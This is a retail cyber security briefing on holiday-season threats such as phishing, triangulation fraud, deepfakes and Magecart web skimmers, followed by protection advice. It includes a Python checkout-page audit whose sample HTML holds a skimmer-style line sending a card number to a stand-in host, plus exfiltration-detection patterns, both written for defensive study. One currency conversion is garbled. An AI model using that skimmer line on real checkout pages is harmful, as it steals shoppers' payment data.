Retail Landscape and Cyber Security
HOLIDAY SEASON – KEY DATES
Singles Day – (November 11th - Ended)
Thanksgiving Sales – November 23rd
Black Friday (White Friday in some parts of the Middle East) – November 24th
Small Business Saturday – November 25th
Cyber Monday – November 27th
GLOBAL PARTICIPATION
Black Friday originated in the US in the 1980s as part of a post-Thanksgiving sales event, and has over the years expanded into a global enterprise of sales, discounts and promotions, thrust at consumers within a mere few days in the lead-up to Christmas. One other major holiday event is the 24-hour shopping extravaganza called ‘Singles Day’, created in China as an anti-Valentine’s celebration, which has since found favour in Middle Eastern countries such as the United Arab Emirates and parts of Europe such as Spain.
Across wider Europe, countries such as the UK, France and Germany all started to adopt Black Friday in the last three to four years, alongside Central and South American countries, China and Southeast Asia, and parts of Africa. In the Middle East, the day is marked as ‘White Friday’, a symbol of positive emotions, images and goodness.
WHAT WE KNOW SO FAR: CYBER CRIME
According to security research in 2023, some of the most common hacking tactics we will see, particularly increasing around peak holiday season sales, include:
Access for sale,
Botnet attacks,
Business email compromise,
Consumer-based attacks,
Malware deployment via email,
Gift card fraud and scams,
Social engineering including phishing,
Vulnerability exploitation.
BUSINESS AND CYBER TRENDS
In 2022, the National Retail Federation reported that holiday sales grew to a record USD$936.3 billion (GBP£767,000), with online traffic to retail sites skyrocketing during this period. In terms of cyber crime, an estimated GBP£10M was stolen by cyber criminals in the UK during the festive season between November 2022 and January 2023. The age groups most likely to be targeted fall between 25 – 34, closely followed by 35 – 44 and 18 – 24.
Despite persistent levels of malicious activity online, researchers believe the number of online shoppers will continue to increase, rising to 2.71 billion and 2.77 billion by 2024 and 2025 respectively. This coincides with the value of global ecommerce sales, which is also on an upward trajectory and will likely surpass USD$7 trillion (GBP£5.5T) by 2024. One other finding identifies ‘mobile commerce’ (smartphone and tablet purchases) as a sector of technology innovation that will be explored for growth more in the coming years.
Shifts prevalent in the way people shop in 2023 include live streaming, live shopping and virtual experiences using social media channels, which provide leverage when promoting products and services through real-time video content. However, the dark side of enhanced technology is that threat actors can now generate content, referred to as ‘synthetic media / identity fraud’, enabling malicious activities through synthetic media.
This involves the creation of deepfake audio and video content to dupe customers into handing over personal or financial data by pretending to be someone in authority or a close family member (the number of deepfakes reported in Q1 2023 was 10% higher than all of 2022 combined). There are also ‘Frankenstein identity’ fraud cases, which involve threat actors using a real Social Security Number bought on the dark web, combined with a real name and date of birth or physical address, to open an account on a retailer site and purchase goods using the identity and stolen credit card details.
Identity theft severely impacts the holiday season, causing mass disruption to business operations and sales, through card skimming, for example. This type of cyber crime has increased by 77% (from 70,000 to 120,000 cards stolen between 2022 and 2023). Cyber criminals are known to steal credit card information from online checkout pages, or by physically stealing data at ATMs. Findings show that this year more card details have been stolen per compromise event (a 48% increase in the average number of cards impacted per compromise), meaning more consumers become victims.
CYBER CRIME IMPACTING BLACK FRIDAY
Social engineering. An example of social engineering, which is a prevalent threat for all industries, not just retail, during the holiday season is phishing. This technique involves deceptive messages appearing to be from a legitimate organisation or big-name brand, often sharing promotional offers or urgent notifications and preying on consumer emotions and time pressure. The well-crafted messages are designed to trick recipients into revealing sensitive information, or into downloading malware by clicking on embedded malicious links or attachments that redirect to fake websites imitating the target organisation.
Interactive email modules. These enable consumers to shop solely through their inbox, placing items into baskets and accessing personalised discounts before checking out on the retailer’s website. This is likely to create more opportunity for threat actors around Black Friday, with tailored emails promoting products to customers who think they are adding items to their basket and being transferred to a legitimate payment site.
Gift card fraud. This can take place through email, with fraudsters coercing shoppers into purchasing gift cards under the guise of resolving an issue, then making off with the funds. Fake order confirmations also peak during the holiday season and can include convincing logos and graphics from the target organisation to trick shoppers into clicking on malicious links, thinking they are making contact to dispute the non-existent purchase.
Fake charity donations. During the holiday season there is a surge in charity donations, making it a good time for opportunists to increase scam activity. These threat actors set up bogus charities and employ high-pressure tactics to get consumers to donate.
Spoofed websites. These are created to mimic legitimate online retailers, using the same logo, branding and product descriptions, lulling users into a false sense of security so that they unknowingly share personal and financial information.
Organised retail crime. During the holiday season, organised criminals operate in full view: they create typo-squat domains and websites, are active on social media, show openness to connect with customers through fake product reviews, and get in touch by email, phone calls and SMS to drive sales and gain financial rewards.
Reseller bots. Bought by threat actors on the dark web, these are designed to scrape inventory-related data from websites and use this information to purchase excessive quantities of products from retail merchants. Bulk purchasing of inventory prevents customers and retailers from completing sales, with threat actors going on to sell the products on dark web and third-party marketplaces, resulting in mass inventory shortages.
Triangulation fraud. Carried out by threat actors using stolen credit card details bought on the dark web. A customer unknowingly makes a purchase from a legitimate ecommerce marketplace like Amazon or eBay, but the seller turns out to be a fraudster who, after receiving the order, buys the requested item from a legitimate online store using the stolen credit card details of an unknown victim and ships it to the customer. The owner of the credit card requests a chargeback, while the retailer is responsible for paying the chargeback fee. This often reflects poorly on retailers if they receive too many chargeback requests, and decreases trust from consumers.
AI fraud (a.k.a. synthetic identity fraud). This involves impersonating a CEO or person of interest’s voice and image using deepfake technology to persuade the target to disclose sensitive information, transfer funds into an attacker-controlled account, or click on a malicious link that installs malware. With the advent of AI, this enables more sophisticated and targeted cyber attacks. The National Cyber Security Centre (NCSC) in the UK issued warnings in November calling for increased consumer vigilance as AI-generated scams enhance the threat throughout this year’s festivities, revealing that over 7 in 10 British people worry that AI will make it easier for cyber criminals to commit online fraud.
Web skimmers. Threat actors can launch cyber attacks against ecommerce platforms using Magecart malware code (Magecart is an umbrella term for a host of cyber criminal groups known to employ malware and target the checkout pages of the retail, consumer goods, hospitality and travel industries). These threat groups exploit vulnerabilities in popular third-party platforms used to power websites, such as Magento, WooCommerce, Shopify and WordPress. The goal is to steal sensitive information including customer payment details and financial data.
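As an added defender-side example that is not part of the original report, the Python audit below checks a checkout page for the script injection web skimmers rely on: third-party scripts from origins the retailer has not approved, approved scripts loaded without Subresource Integrity, and inline scripts that both read card fields and send data out. The allowlisted hosts and the sample page are constructed assumptions, not any real retailer's configuration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed retailer configuration (constructed for this example).
FIRST_PARTY = "shop.example"
ALLOWED_SCRIPT_HOSTS = {FIRST_PARTY, "cdn.example"}
# Inline-script heuristic: a script that both reads card fields and sends data elsewhere.
FIELD_RE = re.compile(r"card|cvv|cvc|expir", re.I)
EXFIL_RE = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=", re.I)

class ScriptCollector(HTMLParser):
    # Collects every <script>: its src, whether it carries an SRI hash, and its inline body.
    def __init__(self):
        super().__init__()
        self.scripts, self._current = [], None
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "sri": "integrity" in a, "body": ""}
    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data
    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None

def audit_checkout_page(html):
    """Return findings for scripts a checkout page should not be running."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for s in parser.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname or FIRST_PARTY  # relative src = first party
            if host not in ALLOWED_SCRIPT_HOSTS:
                findings.append(f"unapproved external script: {s['src']}")
            elif not s["sri"]:
                findings.append(f"approved script without SRI: {s['src']}")
        elif FIELD_RE.search(s["body"]) and EXFIL_RE.search(s["body"]):
            findings.append("inline script reads card fields and sends data out")
    return findings

# Constructed sample checkout page containing one injected, skimmer-like inline script.
SAMPLE_HTML = """<html><body>
<script src="https://cdn.example/checkout.js" integrity="sha384-PLACEHOLDER"></script>
<script src="https://static.example/analytics.js"></script>
<form><input name="cardnumber"><input name="cvv"></form>
<script>var c = document.forms[0].cardnumber.value; new Image().src = "https://collect.example/?c=" + c;</script>
</body></html>"""
```

Run `audit_checkout_page(SAMPLE_HTML)` against a saved copy of a checkout page; a clean page returns an empty list.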
CONSUMER-FOCUSED PROTECTION
Keep updated with government advice. For example, the NCSC warns shoppers to beware of phishing campaigns and online scams purporting to offer Black Friday bargains.
Implement multi-factor authentication including a strong password made up of three random words, and an authenticator code (bonus points for using biometrics and a PIN for verification).
As part of the Cyber Aware campaign, it is important to research sellers on third-party sites before purchasing and check that they are legitimate. Just because someone has a lot of good reviews does not mean they can be trusted; remember ‘always verify, never trust’.
Use a secure card payment platform such as PayPal, Google Pay or Apple Pay, and only provide the details required at checkout (those marked with an asterisk; if a field is not marked, you do not need to fill it in). Remember, all information given to a cyber criminal is useful and will be used in the future, so limit your exposure online.
Report any instances of phishing to Suspicious Email Reporting Service (SERS) at report@phishing.gov.uk. Report malicious ads to the Advertising Standards Authority (ASA) website.
Block incoming calls from suspicious numbers and call your bank should you suspect you have been scammed. It is important to get the compromised card blocked and protected from any further interference. Likewise, you can verify company phone numbers on the ‘GetHuman’ website https://gethuman.com.
Action fraud helpline - https://www.actionfraud.police.uk and https://www.scotland.police.uk.
RETAILER-FOCUSED PREVENTION
Retailers and ecommerce marketplaces are increasingly using third-party AI tools to gather data such as IP addresses, device fingerprinting (biometrics) and behavioural analytics, enabling transactions to be cross-referenced against a customer’s entire purchase history to avoid fake disputes and policy abuse. Retailers should consider combining efforts and pulling together data from a wide range of sources, including enhanced technology such as biometrics, to help spot the warning signs of threat actors.
Implement anti-malware and ransomware detection technologies, which are necessary to reduce the risk of a severe cyber attack causing operational, reputational and financial damage to retail organisations.
Patch management, keeping software, plugins and third-party integrations up to date, is crucial to minimise the risk of exploitation by cyber threats. Likewise, robust incident response planning should be in place, including mitigation steps and instructions for relevant teams to follow in the event of a cyber attack.